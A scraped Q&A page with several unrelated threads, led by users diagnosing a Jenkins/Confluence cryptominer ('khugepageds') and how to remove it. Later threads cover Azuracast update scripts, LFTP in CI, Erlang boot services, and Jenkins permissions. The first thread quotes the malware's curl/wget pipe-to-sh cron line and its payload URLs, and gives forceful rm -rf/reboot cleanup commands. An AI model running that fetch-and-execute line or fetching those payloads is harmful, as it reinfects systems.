Jenkins High CPU Usage Khugepageds - jenkins

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?

So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).

Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.

This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.

it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.

A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..

In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.

Related

Script to automate timeshift backup and azuracast update

I’m running an Azuracast docker instance on Linode and want to try to find a way to automate my updates. Right now my routine is when I notice there are updates by accessing the Azuracast web panel, I usually run timeshift to create a backup using the following command
timeshift —-create —-comment “azuracast update ”
And then I use the following to update azuracast
cd /var/azuracast/
./docker.sh update-self
./docker.sh update
Then it asks me to ensure the azuracast installation is backed up before updating, to which i would usually just press enter.
After that is completed, it asks me if i want to clean up all stopped docker containers and images to save space, which i usually say no to.
What I’m wondering is if there is a way to create a bash script, or python or something to automate all of this, and then have it run on a schedule?
Sure, you can write a shell script to execute these commands and then run it on a schedule using crontab(5).
For example your script might look like:
#! /bin/sh
# Backup azuracast and restart docker container
timeshift --create --comment “azuracast update” && \
cd /var/azuracast/ && \
./docker.sh update-self && \
(yes | ./docker.sh update)
It sounds like this docker.sh program takes some user inputs. See if there are options you can pass to it that will allow you to run it non-interactively. (Seems there isn't, see edit.)
To setup your cron job, you can put the script in /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, or /etc/cron.monthly. Or if you need more control, you can get started configuring a cron job with crontab -e. Better explanation.
EDIT: Assuming this is the script you're using, it doesn't seem to have a way to run update non-interactively. Fear not though, there's a program for this: yes(1). This will answer yes to both of the questions, but honestly running docker system prune -f is probably a good idea. If you really want to answer no to that, you could probably substitute yes for printf "y\nn" to answer yes to the first and no to the second.
Also note that there's at least one other y/n question it could ask you, which you probably want to answer yes to.

Continuous deployment using LFTP gets "stuck" temporarily after about 10 files

I am using GitLab Community Edition and GitLab runner CI setup to deploy (synchronize) a bunch of JSON files on a server using LFTP. This job however, seems to "freeze" for a few minutes every 10 files roughly. Having to synchronize roughly 400 files sometimes, this job simply crashes because it sometimes takes more than an hour to complete. The JSON files are all 1KB. Neither the source and target servers should have any firewalls rate limiting the FTP. Both are hosted at OVH.
The following LFTP command is executed in orer to synchronize everything:
lftp -v -c "set sftp:auto-confirm true; open sftp://$DEVELOPMENT_DEPLOY_USER:$DEVELOPMENT_DEPLOY_PASSWORD#$DEVELOPMENT_DEPLOY_HOST:$DEVELOPMENT_DEPLOY_PORT; mirror -Rev ./configuration_files configuration/configuration_files --exclude .* --exclude .*/ --include ./*.json"
Job is ran in Docker, using this container to deploy everything. What could cause this?
For those of you coming from google we had the exact same setup. The way to get LFTP to stop hanging when running in a docker or some other CI you can use this command:
lftp -c "set net:timeout 5; set net:max-retries 2; set net:reconnect-interval-base 5; set ftp:ssl-force yes; set ftp:ssl-protect-data true; open -u $USERNAME,$PASSWORD $HOST; mirror dist / -Renv --parallel=10"
This does several things:
It makes it so it won't wait forever or get into a continuous loop
when it can't do a command. This should speed things along.
Makes sure we are using SSL/TLS. If you don't need this remove those
options.
Synchronizes one folder to the new location. The options -Renv can
be explained here: https://lftp.yar.ru/lftp-man.html
Lastly in the gitlab CI I set the job to retry if it fails. This will spin up a new docker instance that gets around any open file or connection limitations. The above LFTP command will run again but since we are using the -n flag it will only move over the files that were missed on the first job if it doesn't succeed. This gets everything moved over without hassle. You can read more about CI job retrys here: https://docs.gitlab.com/ee/ci/yaml/#retry
Have you looked at using rsync instead? I'm fairly sure you can benefit from the incremental copying of files as opposed to copying the entire set over each time.

Starting Erlang service at boot time (using Relx for creating release)

I have a server written in Erlang, compiled with Rebar, and I make a release with Relx. Starts nicely with
/root/rel/share3/bin/share3 start
The next step is to start when the server boots.
I have tried different approaches, the last one is using the /etc/init.d/skeleton where I changed the following
NAME=share3
DAEMON=/root/rel/share3/bin/share3
DAEMON_ARGS="$1"
After that, I run update-rc.d, but I have not gotten it too work. (Ubuntu 14.04)
The service runs until the machine reboots, and I need to login and start it again.
For Windows, it is really elegant, since it can create the Windows service.
Ubuntu uses upstart as init system, so you could try something like that:
description "Start my awesome service"
start on runlevel [2345]
stop on runlevel [!2345]
respawn
exec /root/rel/share3/bin/share3
You have to place this script in /etc/init/ directory with '.conf' extension like '/etc/init/share3.coinf'. To start it invoke sudo start share3.
At last, I solved it!
I have told to relx to place the result at /home/mattias/rel. The script from relx is /home/mattias/rel/share3/bin/share3
Replace the row
SCRIPT_DIR="$(dirname "$0")"
by (you need to fix the path /home/mattias/rel)
HOME=/home/mattias
export HOME
SCRIPT_DIR="/home/mattias/rel/share3/bin"
Copy the file to /etc/init.d/share3 using
sudo cp ~/rel/share3/bin/share3 /etc/init.d/
Test that it works using
/etc/init.d/share3 start
and
/etc/init.d/share3 stop
In order to make it start at boot, install sysv-rc-conf
sudo apt-get install sysv-rc-conf
Enable boot at start using
sudo sysv-rc-conf share3 on
and disable
sudo sysv-rc-conf share3 off
Alternatives are welcome.

Jenkins installation - Unable to create the home directory despite its existence and writeability

I'm trying to install Jenkins on a Tomcat 7 container.
When I try to open the Jenkins web app I get following error:
Unable to create the home directory '/home/myuser/jenkins/work'. This is most
likely a permission problem.
To change the home directory, use JENKINS_HOME environment variable or set
the JENKINS_HOME system property. See Container-specific documentation for
more details of how to do this.
Before starting Tomcat, I did chmod uog+rwx /home/myuser/jenkins. So, I suppose that Jenkins should be able to create a subdirectory there.
But obviously it can't.
How can I fix this problem?
Update 1:
lt -lt returns
drwxrwxrwx 2 root ec2-user 4096 Jun 23 10:25 jenkins
for /home/myuser/jenkins. /home/myuser/jenkins/work doesn't exist because Jenkins is supposed to create it.
Update 2: Just tried to create the work directory and to run chmod uog+rwx on it. It didn't help.
Update 3: Additional information:
I need Jenkins in order to
run lengthy tests in the night (fast unit tests are run before every mvn install, slow tests are executed every night) and
save software quality metrics (checkstyle, PMD, FindBugs, unit test coverage etc.) over time.
I have only one machine available for that and there is a Tomcat7 container installed there already.
At the moment, I don't want to invest additional money into buying new machines.
The machine with the Tomcat7 container (and where I want Jenkins to be installed) is an Amazon EC2 microinstance (OS version is given below).
$ cat /etc/*-release
LSB_VERSION=base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Amazon Linux AMI release 2013.03
Update 4 (29.06.2013 13:34 MSK): The output of yum list does not contain any Jenkins/Hudson package.
If Tomcat is running as a separate user you will need to give execute permission to your home directory to that user - either by giving it to all or by creating a group especially for you and the tomcat user.
(UPDATE) More specifically: You say you already did chmod uog+rwx /home/myuser/jenkins, if Tomcat is not running asl 'myuser' it also needs execute permission on /home and on /home/myuser to be able to open /home/myuser/jenkins. If you are not picky about other users on the system opening your homedir you could allow this by: chmod a+x /home/myuser. (I'm assuming here the permissions for /home are already ok)
If you are running tomcat as 'myuser' the filsystem permissions look fine, but Tomcat's own permission system might be the problem as webapps are not allowed to touch the filesystem if the default settings of the security manager are on.
See: https://wiki.jenkins-ci.org/display/JENKINS/Tomcat
You don't specify more about your exact Tomcat/OS setup so I can't give exact details, but the fast way to find out if it's a security manager issue is to give AllPermission to you webapp. If you don't run in a safe environment it is advisable to only use that as a test, and setup only the really needed permissions later.
run these three commands
cd /usr/share/tomcat7
sudo mkdir .jenkins
sudo chown tomcat7:nogroup .jenkins
https://seleniumwithjavapython.wordpress.com/home/jenkins-installation/
It looks like the problem may be that jenkins cannot see /home/myuser, and therefore it cannot access the jenkins folder inside this (even though it has write permissions in /home/myuser/jenkins, I believe the fact it can't read /home/myuser causes a problem).
Try running the below command and then see if Jenkins works after that:
chmod +r /home/myuser
#robjohncox Yes - drwx------ 5 myuser myuser 4096 Jun 23 10:25 myuser
you must add +x to this dir to make it possible for jenkins to access it's contents, to be precise whole path has to have +x enabled for everyone.
Also, what commands have you used to move it's home dir from default - possible error is somwhere there. Cheers, Piotr

Running iOS UIAutomation tests from Jenkins

For a while now I've been trying to work out how to run UIAutomation tests from Jenkins - every time I run the build, it builds fine, then it runs my instruments command (using the same command as detailed here ( Can Instruments be used using the command line?) and jenkins just hangs, well the whole machine does, and when I look at activity monitor I can see an instruments process using 2gb of memory.
When I set up jenkins, I original ran it as from a hidden user - this presented some challenges with jenkins being a deamon and not being able to access the window server. I then decided to change the jenkins account to a normal user, logged in and ran instruments from the command line - this worked fine.. but still had no luck with running it from jenkins.
I have set the jenkins account as a developer - no admin though
Please let me know if there's anything else that I could try, or if anyone has got this running successful your guidance would be much appreciated - Thanks
Jenkins on OS X is started from a launchd script and will run as "daemon" by default. The thing to do is change the user in the launched script.
First, get Jenkins ready to shutdown (in "Manage Jenkins" in the GUI).
Then unload the job from launchd, like so:
$ sudo launchctl unload /Library/LaunchDaemons/org.jenkins-ci.plist
Then edit the "UserName" property in the launchd plist, using the user which you want to run jenkins. There's also a GroupName property, which you may want/need to adjust accordingly with your user's group.
Finally, reload Jenkins with:
$ sudo launchctl load /Library/LaunchDaemons/org.jenkins-ci.plist
Hope that helps!
So if you run it as a daemon, first thing to check what happens if you run Jenkins in the foreground The simplest way to do it is with java -jar jenkins.war [other options] command (see this document).
Maybe you can use this https://github.com/houlianpi/robot4ios.
Then in jenkins execute shell:
sh setup.sh
sh runTests.sh ./sample/alltests.js "/Users/komejun/Library/Application Support/iPhone Simulator/5.0/Applications/1622F505-8C07-47E0-B0F0-3A125A88B329/Recipes.app/"
and the report will be auto create in ./ynmsk-report/test.xml

Resources